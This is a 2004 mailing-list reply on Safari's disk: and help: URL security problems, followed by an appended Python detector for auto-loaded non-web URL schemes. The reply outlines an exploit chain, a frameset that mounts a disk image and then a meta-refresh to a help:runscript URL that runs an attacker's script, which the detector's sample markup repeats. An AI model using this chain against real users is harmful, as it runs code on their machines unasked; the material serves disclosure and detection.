Re: disk:// and help:// security problems
- Subject: Re: disk:// and help:// security problems
- From: Allan Odgaard <email@hidden>
- Date: Tue, 18 May 2004 06:18:54 +0200
On 18. May 2004, at 5:58, Jonathan Wight wrote:
> Actually that's slightly incorrect I believe. You need two URLs, one
> to download a malicious AppleScript and then the help:// URL to cause
> it to execute.

This is why the disk:-URL was also mentioned in the exploit.

> Also the user must have auto-open 'safe' downloads turned on _and_
> have his/her download location known to the attacker (probably
> ~/Desktop).

Let index.html have two frames, the first with a disk:-URL to a
disk-image and let the second use meta-refresh with a small delay and
the new target
help:runscript=/Volumes/DiskImageWeJustMounted/Dangerous.scpt -- it's
that simple!

I didn't test it, other than verifying that entering a help:-URL with a
runscript does execute the script, and likewise does a disk:-URL mount
the disk image. There might be some security measures in Safari, like
only adhering to Launch Services when the URL was clicked or entered
manually, which would make it a less likely exploit, but I doubt it, as
that would probably break a lot of stuff, like redirects to ftp-sites
etc. -- the fix should be to *not* allow help:-URLs (from the outside
world) to execute arbitrary scripts.
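
A detection sketch for the pattern discussed in this message, added here as an example and not part of the original post: it flags frames, embedded objects and meta-refresh targets whose URL scheme is outside an assumed web allowlist, which is how a disk: or help: URL gets loaded without a click. The names `WEB_SCHEMES`, `AutoNavScanner` and `scan`, and the sample markup with its `example.invalid` host, are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit
import re

# Assumption: schemes a page may load or navigate to without a user gesture.
WEB_SCHEMES = {"", "http", "https", "ftp"}
# Tags whose URL attribute is fetched automatically when the page loads.
AUTO_LOAD = {"frame": "src", "iframe": "src", "embed": "src", "object": "data"}
# Pulls the target out of a refresh value such as "2; url=scheme:rest".
REFRESH_URL = re.compile(r"^\s*[\d.]+\s*[;,]\s*(?:url\s*=\s*)?['\"]?(.*?)['\"]?\s*$", re.I | re.S)

# Constructed sample: the frame and meta-refresh layout the message describes.
SAMPLE = """
<frame src="disk://example.invalid/image.dmg">
<frame src="second.html">
<meta http-equiv="refresh" content="2; url=help:runscript=/Volumes/DiskImageWeJustMounted/Dangerous.scpt">
<meta http-equiv="refresh" content="5; url=https://example.invalid/next">
"""


class AutoNavScanner(HTMLParser):
    """Collects automatic loads and redirects that target a non-web scheme."""

    def __init__(self):
        super().__init__()
        self.findings = []  # (source, scheme, url)

    def _check(self, source, url):
        scheme = urlsplit(url.strip()).scheme.lower()
        if scheme not in WEB_SCHEMES:
            self.findings.append((source, scheme, url.strip()))

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag in AUTO_LOAD and a.get(AUTO_LOAD[tag]):
            self._check(tag, a[AUTO_LOAD[tag]])
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = REFRESH_URL.match(a.get("content", ""))
            if m and m.group(1):
                self._check("meta-refresh", m.group(1))


def scan(html):
    """Return the list of findings for one HTML document."""
    scanner = AutoNavScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings
```

Calling `scan(SAMPLE)` reports the disk: frame and the help: redirect and leaves the relative and https targets alone.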